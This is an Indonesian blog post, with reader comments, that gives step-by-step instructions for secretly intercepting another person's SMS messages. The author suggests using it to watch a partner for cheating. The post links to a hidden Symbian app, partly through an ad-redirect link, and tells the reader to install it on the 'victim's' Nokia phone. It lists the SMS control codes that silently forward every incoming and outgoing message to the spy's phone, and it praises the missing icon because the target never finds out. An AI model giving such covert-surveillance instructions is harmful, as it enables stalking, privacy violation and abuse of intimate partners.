Cari Artikel Blog ini

sponsor

Cara mudah menyadap SMS dari ponsel anda

ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh.
hehehehehehe .

oke langsung saja.

syarat:


# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis


hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis

Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :


1. download smsanywherelite.sis untuk software menyadap.
direct link :
http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SIS

kalau tidak bisa disitu, silahkan download di :
http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html


2. Masukkan aplikasi symbian itu di HP anda dan korban

3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel korban anda

5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.

6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya 36


selamat mencoba . . .

referensi :
forum cyberdos,

Baca juga yang ini :



Tags: ,

19 comments:

Anonim mengatakan...

pd point ke tiga " hingga pengiriman sms ke ponsel lain" brarti ketika aplikasi ini ditanam di hp target, target tidak bisa sms keluar yah..bener ga?

IMAM MAKSUM mengatakan...

Wach keren ne tertarik gwe....


lam knal bos dr KASIH

Dhendhie mengatakan...

@anonim

sang target bisa sms keluar.
tetapi sebelumnya anda juga terkena pulsa setiap sang target anda mengirim dan menerima SmS dari siapapun.

@Imam Maksum

Salam kenal juga untuk Kasih.

Danny mengatakan...

Yang dipasang aplikasinya HP target aja atau 22nya... klo 22nya berarti klo kita sms juga bisa masuk/lari ke hp target juga dong? thanks yaaa

Dhendhie mengatakan...

@danny

cukup untuk sang target anda.
sebelumnya, cara ini juga membuang pulsa anda.

ury mengatakan...
Komentar ini telah dihapus oleh pengarang.
ury mengatakan...

klo kita ga punya pulsa berarti setiap target kirim sms ke orang ga akan masuk ke hp kita donk???
bener ga???

Dhendhie mengatakan...

@ury

jelasnya begitu. untuk mas ury.

SADDANGQ mengatakan...

kak tau gak kode activation norton 2009????tolong dicari ya???

adi toku mengatakan...

klo cara lain yang ga mbuang pulsa hp si penyadap ada ga,,,? apa cuma cara itu aja,,,?

Anonim mengatakan...

cara instalnya gimana donk

Anonim mengatakan...

klo kblkan nya...???kalo kita pgn tau,ap kita lagi disadap ap ga??cara nya gmn????tHX

king mengatakan...

Ae kak..
Klu cmn bajak data backup dr sms korban dlm be2rapa hri gitu,bisa gak?Jd kt gak perlu kena pls wakt si korban kirim sms?

adiv mengatakan...

password nya bikin sendiri ato gmna??

Tata Angin mengatakan...

ga bisa ya LG sama samsung??

Blog's Bagi Yang Mau Tau Aja mengatakan...

kok saya nda bisa nginstal programnya ya.. format tidak didukung gtu dibilang

diegoamc mengatakan...

koq di HP X2-01 & 5610X-press music ga bisa,....???
katanya format file tidak didukung gitu............

Niko98.com mengatakan...

nice Share.. :)

Download Games PC GRATIS:

www.niko98-jr.blogspot.com

Jusuf Dewa Sribuana mengatakan...

Baang.. HP aku ga pernah aku password, terus apa n bagaimana hubungannya password target dengan HP ku yang ga pernah aku password..?

Poskan Komentar

silahkan tinggalkan komentar,
bila tidak punya ID google, yahoo, Open ID, atau lainnya pilih pada pilihan anonymous [dimohon mencantumkan nama].